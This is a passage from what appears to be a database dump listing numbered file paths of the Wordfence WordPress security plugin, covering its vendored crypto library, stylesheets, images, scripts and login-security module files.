odium_compat/src/Core/Curve25519/Ge/P2.php'),(763,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(764,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(765,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php'),(766,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php'),(767,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php'),(768,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php'),(769,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php'),(770,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php'),(771,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php'),(772,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php'),(773,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php'),(774,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php'),(775,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php'),(776,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php'),(777,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php'),(778,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php'),(779,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php'),(780,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(781,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(782,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php'),(783,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php'),(784,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(785,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(786,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(787,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(788,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(789,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php'),(790,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php'),(791,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php'),(792,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php'),(793,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php'),(794,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php'),(795,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php'),(796,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php'),(797,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php'),(798,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php'),(799,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php'),(800,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php'),(801,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php'),(802,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php'),(803,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php'),(804,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php'),(805,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php'),(806,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php'),(807,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php'),(808,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php'),(809,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php'),(810,'wp-content/plugins/wordfence/css/activity-report-widget.1623076348.css'),(811,'wp-content/plugins/wordfence/css/diff.1623076348.css'),(812,'wp-content/plugins/wordfence/css/dt_table.1623076348.css'),(813,'wp-content/plugins/wordfence/css/fullLog.1623076348.css'),(814,'wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png'),(815,'wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png'),(816,'wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png'),(817,'wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png'),(818,'wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png'),(819,'wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png'),(820,'wp-content/plugins/wordfence/css/iptraf.1623076348.css'),(821,'wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1623076348.css'),(822,'wp-content/plugins/wordfence/css/jquery-ui.min.1623076348.css'),(823,'wp-content/plugins/wordfence/css/jquery-ui.structure.min.1623076348.css'),(824,'wp-content/plugins/wordfence/css/jquery-ui.theme.min.1623076348.css'),(825,'wp-content/plugins/wordfence/css/main.1623076348.css'),(826,'wp-content/plugins/wordfence/css/phpinfo.1623076348.css'),(827,'wp-content/plugins/wordfence/css/wf-adminbar.1623076348.css'),(828,'wp-content/plugins/wordfence/css/wf-colorbox.1623076348.css'),(829,'wp-content/plugins/wordfence/css/wf-font-awesome.1623076348.css'),(830,'wp-content/plugins/wordfence/css/wf-global.1623076348.css'),(831,'wp-content/plugins/wordfence/css/wf-ionicons.1623076348.css'),(832,'wp-content/plugins/wordfence/css/wf-onboarding.1623076348.css'),(833,'wp-content/plugins/wordfence/css/wf-roboto-font.1623076348.css'),(834,'wp-content/plugins/wordfence/css/wfselect2.min.1623076348.css'),(835,'wp-content/plugins/wordfence/css/wordfenceBox.1623076348.css'),(836,'wp-content/plugins/wordfence/images/2fa-whole.svg'),(837,'wp-content/plugins/wordfence/images/2fa1.svg'),(838,'wp-content/plugins/wordfence/images/2fa2.svg'),(839,'wp-content/plugins/wordfence/images/back_disabled.jpg'),(840,'wp-content/plugins/wordfence/images/back_enabled.jpg'),(841,'wp-content/plugins/wordfence/images/blocking.svg'),(842,'wp-content/plugins/wordfence/images/button-grad-grey.png'),(843,'wp-content/plugins/wordfence/images/checkbox.png'),(844,'wp-content/plugins/wordfence/images/flags.png'),(845,'wp-content/plugins/wordfence/images/forward_disabled.jpg'),(846,'wp-content/plugins/wordfence/images/forward_enabled.jpg'),(847,'wp-content/plugins/wordfence/images/help.png'),(848,'wp-content/plugins/wordfence/images/icons/ajax24.gif'),(849,'wp-content/plugins/wordfence/images/icons/ajax3.gif'),(850,'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif'),(851,'wp-content/plugins/wordfence/images/icons/ajaxScan.gif'),(852,'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif'),(853,'wp-content/plugins/wordfence/images/icons/arrow_refresh.png'),(854,'wp-content/plugins/wordfence/images/icons/bullet_yellow.png'),(855,'wp-content/plugins/wordfence/images/icons/email_go.png'),(856,'wp-content/plugins/wordfence/images/icons/error128.png'),(857,'wp-content/plugins/wordfence/images/icons/magnifier.png'),(858,'wp-content/plugins/wordfence/images/icons/tick128.png'),(859,'wp-content/plugins/wordfence/images/icons/warning128.png'),(860,'wp-content/plugins/wordfence/images/icons/working-indicator.gif'),(861,'wp-content/plugins/wordfence/images/lightbox-controls.png'),(862,'wp-content/plugins/wordfence/images/loading.gif'),(863,'wp-content/plugins/wordfence/images/loading_background.png'),(864,'wp-content/plugins/wordfence/images/loading_large.gif'),(865,'wp-content/plugins/wordfence/images/logo.png'),(866,'wp-content/plugins/wordfence/images/options.svg'),(867,'wp-content/plugins/wordfence/images/ratelimiting.svg'),(868,'wp-content/plugins/wordfence/images/sort_asc.gif'),(869,'wp-content/plugins/wordfence/images/sort_asc.png'),(870,'wp-content/plugins/wordfence/images/sort_asc_disabled.gif'),(871,'wp-content/plugins/wordfence/images/sort_asc_disabled.png'),(872,'wp-content/plugins/wordfence/images/sort_both.gif'),(873,'wp-content/plugins/wordfence/images/sort_both.png'),(874,'wp-content/plugins/wordfence/images/sort_desc.gif'),(875,'wp-content/plugins/wordfence/images/sort_desc.png'),(876,'wp-content/plugins/wordfence/images/sort_desc_disabled.gif'),(877,'wp-content/plugins/wordfence/images/sort_desc_disabled.png'),(878,'wp-content/plugins/wordfence/images/support.svg'),(879,'wp-content/plugins/wordfence/images/tools.svg'),(880,'wp-content/plugins/wordfence/images/wf-central-logo.svg'),(881,'wp-content/plugins/wordfence/images/wf-error-badge.svg'),(882,'wp-content/plugins/wordfence/images/wf-horizontal.svg'),(883,'wp-content/plugins/wordfence/images/wordfence-logo.svg'),(884,'wp-content/plugins/wordfence/index.php'),(885,'wp-content/plugins/wordfence/js/Chart.bundle.min.1623076348.js'),(886,'wp-content/plugins/wordfence/js/admin.1623076348.js'),(887,'wp-content/plugins/wordfence/js/admin.ajaxWatcher.1623076348.js'),(888,'wp-content/plugins/wordfence/js/admin.liveTraffic.1623076348.js'),(889,'wp-content/plugins/wordfence/js/date.1623076348.js'),(890,'wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1623076348.js'),(891,'wp-content/plugins/wordfence/js/jquery.colorbox-min.1623076348.js'),(892,'wp-content/plugins/wordfence/js/jquery.colorbox.1623076348.js'),(893,'wp-content/plugins/wordfence/js/jquery.dataTables.min.1623076348.js'),(894,'wp-content/plugins/wordfence/js/jquery.qrcode.min.1623076348.js'),(895,'wp-content/plugins/wordfence/js/jquery.tmpl.min.1623076348.js'),(896,'wp-content/plugins/wordfence/js/jquery.tools.min.1623076348.js'),(897,'wp-content/plugins/wordfence/js/knockout-3.3.0.1623076348.js'),(898,'wp-content/plugins/wordfence/js/wfdashboard.1623076348.js'),(899,'wp-content/plugins/wordfence/js/wfdropdown.1623076348.js'),(900,'wp-content/plugins/wordfence/js/wfglobal.1623076348.js'),(901,'wp-content/plugins/wordfence/js/wfi18n.1623076348.js'),(902,'wp-content/plugins/wordfence/js/wfpopover.1623076348.js'),(903,'wp-content/plugins/wordfence/js/wfselect2.min.1623076348.js'),(904,'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php'),(905,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php'),(906,'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php'),(907,'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php'),(908,'wp-content/plugins/wordfence/lib/Diff.php'),(909,'wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb'),(910,'wp-content/plugins/wordfence/lib/IPTraf.php'),(911,'wp-content/plugins/wordfence/lib/IPTrafList.php'),(912,'wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php'),(913,'wp-content/plugins/wordfence/lib/compat.php'),(914,'wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php'),(915,'wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php'),(916,'wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php'),(917,'wp-content/plugins/wordfence/lib/dashboard/widget_countries.php'),(918,'wp-content/plugins/wordfence/lib/dashboard/widget_ips.php'),(919,'wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php'),(920,'wp-content/plugins/wordfence/lib/dashboard/widget_logins.php'),(921,'wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php'),(922,'wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php'),(923,'wp-content/plugins/wordfence/lib/diffResult.php'),(924,'wp-content/plugins/wordfence/lib/email_genericAlert.php'),(925,'wp-content/plugins/wordfence/lib/email_newIssues.php'),(926,'wp-content/plugins/wordfence/lib/email_unlockRequest.php'),(927,'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php'),(928,'wp-content/plugins/wordfence/lib/flags.php'),(929,'wp-content/plugins/wordfence/lib/live_activity.php'),(930,'wp-content/plugins/wordfence/lib/menu_dashboard.php'),(931,'wp-content/plugins/wordfence/lib/menu_dashboard_options.php'),(932,'wp-content/plugins/wordfence/lib/menu_firewall.php'),(933,'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php'),(934,'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php'),(935,'wp-content/plugins/wordfence/lib/menu_firewall_waf.php'),(936,'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php'),(937,'wp-content/plugins/wordfence/lib/menu_options.php'),(938,'wp-content/plugins/wordfence/lib/menu_scanner.php'),(939,'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php'),(940,'wp-content/plugins/wordfence/lib/menu_scanner_options.php'),(941,'wp-content/plugins/wordfence/lib/menu_support.php'),(942,'wp-content/plugins/wordfence/lib/menu_tools.php'),(943,'wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php'),(944,'wp-content/plugins/wordfence/lib/menu_tools_importExport.php'),(945,'wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php'),(946,'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php'),(947,'wp-content/plugins/wordfence/lib/menu_tools_whois.php'),(948,'wp-content/plugins/wordfence/lib/menu_wordfence_central.php'),(949,'wp-content/plugins/wordfence/lib/noc1.key'),(950,'wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php'),(951,'wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php'),(952,'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php'),(953,'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php'),(954,'wp-content/plugins/wordfence/lib/sysinfo.php'),(955,'wp-content/plugins/wordfence/lib/viewFullActivityLog.php'),(956,'wp-content/plugins/wordfence/lib/wf503.php'),(957,'wp-content/plugins/wordfence/lib/wfAPI.php'),(958,'wp-content/plugins/wordfence/lib/wfActivityReport.php'),(959,'wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php'),(960,'wp-content/plugins/wordfence/lib/wfAlerts.php'),(961,'wp-content/plugins/wordfence/lib/wfArray.php'),(962,'wp-content/plugins/wordfence/lib/wfBrowscap.php'),(963,'wp-content/plugins/wordfence/lib/wfBrowscapCache.php'),(964,'wp-content/plugins/wordfence/lib/wfBulkCountries.php'),(965,'wp-content/plugins/wordfence/lib/wfCache.php'),(966,'wp-content/plugins/wordfence/lib/wfCentralAPI.php'),(967,'wp-content/plugins/wordfence/lib/wfConfig.php'),(968,'wp-content/plugins/wordfence/lib/wfCrawl.php'),(969,'wp-content/plugins/wordfence/lib/wfCredentialsController.php'),(970,'wp-content/plugins/wordfence/lib/wfCrypt.php'),(971,'wp-content/plugins/wordfence/lib/wfDB.php'),(972,'wp-content/plugins/wordfence/lib/wfDashboard.php'),(973,'wp-content/plugins/wordfence/lib/wfDateLocalization.php'),(974,'wp-content/plugins/wordfence/lib/wfDiagnostic.php'),(975,'wp-content/plugins/wordfence/lib/wfDict.php'),(976,'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php'),(977,'wp-content/plugins/wordfence/lib/wfHelperBin.php'),(978,'wp-content/plugins/wordfence/lib/wfHelperString.php'),(979,'wp-content/plugins/wordfence/lib/wfIPWhitelist.php'),(980,'wp-content/plugins/wordfence/lib/wfImportExportController.php'),(981,'wp-content/plugins/wordfence/lib/wfIssues.php'),(982,'wp-content/plugins/wordfence/lib/wfJWT.php'),(983,'wp-content/plugins/wordfence/lib/wfLockedOut.php'),(984,'wp-content/plugins/wordfence/lib/wfLog.php'),(985,'wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php'),(986,'wp-content/plugins/wordfence/lib/wfModuleController.php'),(987,'wp-content/plugins/wordfence/lib/wfNotification.php'),(988,'wp-content/plugins/wordfence/lib/wfOnboardingController.php'),(989,'wp-content/plugins/wordfence/lib/wfPersistenceController.php'),(990,'wp-content/plugins/wordfence/lib/wfRESTAPI.php'),(991,'wp-content/plugins/wordfence/lib/wfScan.php'),(992,'wp-content/plugins/wordfence/lib/wfScanEngine.php'),(993,'wp-content/plugins/wordfence/lib/wfSchema.php'),(994,'wp-content/plugins/wordfence/lib/wfStyle.php'),(995,'wp-content/plugins/wordfence/lib/wfSupportController.php'),(996,'wp-content/plugins/wordfence/lib/wfUnlockMsg.php'),(997,'wp-content/plugins/wordfence/lib/wfUpdateCheck.php'),(998,'wp-content/plugins/wordfence/lib/wfUtils.php'),(999,'wp-content/plugins/wordfence/lib/wfVersionCheckController.php'),(1000,'wp-content/plugins/wordfence/lib/wfView.php'),(1001,'wp-content/plugins/wordfence/lib/wfViewResult.php'),(1002,'wp-content/plugins/wordfence/lib/wordfenceClass.php'),(1003,'wp-content/plugins/wordfence/lib/wordfenceConstants.php'),(1004,'wp-content/plugins/wordfence/lib/wordfenceHash.php'),(1005,'wp-content/plugins/wordfence/lib/wordfenceScanner.php'),(1006,'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php'),(1007,'wp-content/plugins/wordfence/models/block/wfBlock.php'),(1008,'wp-content/plugins/wordfence/models/block/wfRateLimit.php'),(1009,'wp-content/plugins/wordfence/models/common/wfGeoIP2.php'),(1010,'wp-content/plugins/wordfence/models/common/wfTab.php'),(1011,'wp-content/plugins/wordfence/models/firewall/wfFirewall.php'),(1012,'wp-content/plugins/wordfence/models/page/wfPage.php'),(1013,'wp-content/plugins/wordfence/models/scanner/wfScanner.php'),(1014,'wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php'),(1015,'wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php'),(1016,'wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php'),(1017,'wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php'),(1018,'wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php'),(1019,'wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php'),(1020,'wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php'),(1021,'wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php'),(1022,'wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php'),(1023,'wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php'),(1024,'wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php'),(1025,'wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php'),(1026,'wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php'),(1027,'wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php'),(1028,'wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php'),(1029,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php'),(1030,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php'),(1031,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php'),(1032,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php'),(1033,'wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php'),(1034,'wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php'),(1035,'wp-content/plugins/wordfence/modules/login-security/classes/model/request.php'),(1036,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php'),(1037,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php'),(1038,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php'),(1039,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php'),(1040,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php'),(1041,'wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php'),(1042,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php'),(1043,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php'),(1044,'wp-content/plugins/wordfence/modules/login-security/classes/model/view.php'),(1045,'wp-content/plugins/wordfence/modules/login-security/css/admin-global.1623076348.css'),(1046,'wp-content/plugins/wordfence/modules/login-security/css/admin.1623076348.css'),(1047,'wp-content/plugins/wordfence/modules/login-security/css/colorbox.1623076348.css'),(1048,'wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1623076348.css'),(1049,'wp-content/plugins/wordfence/modules/login-security/css/ionicons.1623076348.css'),(1050,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1623076348.css'),(1051,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1623076348.css'),(1052,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1623076348.css'),(1053,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1623076348.css'),(1054,'wp-content/plugins/wordfence/modules/login-security/css/login.1623076348.css'),(1055,'wp-content/plugins/wordfence/modules/login-security/img/header.svg'),(1056,'wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png'),(1057,'wp-content/plugins/wordfence/modules/login-security/img/loading.gif'),(1058,'wp-content/plugins/wordfence/modules/login-security/img/loading_background.png'),(1059,'wp-content/plugins/wordfence/modules/login-security/img/menu.svg'),(1060,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png'),(1061,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png'),(1062,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png'),(1063,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png'),(1064,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png'),(1065,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png'),(1066,'wp-content/plugins/wordfence/modules/login-security/js/admin-global.1623076348.js'),(1067,'wp-content/plugins/wordfence/modules/login-security/js/admin.1623076348.js'),(1068,'wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1623076348.js'),(1069,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1623076348.js'),(1070,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1623076348.js'),(1071,'wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1623076348.js'),(1072,'wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1623076348.js'),(1073,'wp-content/plugins/wordfence/modules/login-security/js/login.1623076348.js'),(1074,'wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php'),(1075,'wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php'),(1076,'wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php'),(1077,'wp-content/plugins/wordfence/modules/login-security/views/manage/code.php'),(1078,'wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php'),(1079,'wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php'),(1080,'wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php'),(1081,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php'),(1082,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php'),(1083,'wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php'),(1084,'wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php'),(1085,'wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php'),(1086,'wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php'),(1087,'wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php'),(1088,'wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php'),(1089,'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),(1090,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php'),(1091,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),(1092,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),(1093,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),(1094,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),(1095,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),(1096,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),(1097,'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),(1098,'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),(1099,'wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),(1100,'wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),(1101,'wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),(1102,'wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),(1103,'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),(1104,'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),(1105,'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),(1106,'wp-content/plugins/wordfence/readme.txt'),(1107,'wp-content/plugins/wordfence/vendor/autoload.php'),(1108,'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),(1109,'wp-content/plugins/wordfence/vendor/composer/LICENSE'),(1110,'wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),(1111,'wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),(1112,'wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),(1113,'wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),(1114,'wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),(1115,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE'),(1116,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem'),(1117,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php'),(1118,'wp-content/plugins/wordfence/vendor/composer/installed.json'),(1119,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules'),(1120,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs'),(1121,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE'),(1122,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php'),(1123,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php'),(1124,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php'),(1125,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php'),(1126,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php'),(1127,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php'),(1128,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php'),(1129,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php'),(1130,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php'),(1131,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php'),(1132,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php'),(1133,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php'),(1134,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php'),(1135,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php'),(1136,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php'),(1137,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php'),(1138,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php'),(1139,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php'),(1140,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php'),(1141,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php'),(1142,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php'),(1143,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php'),(1144,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php'),(1145,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php'),(1146,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php'),(1147,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php'),(1148,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php'),(1149,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php'),(1150,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php'),(1151,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/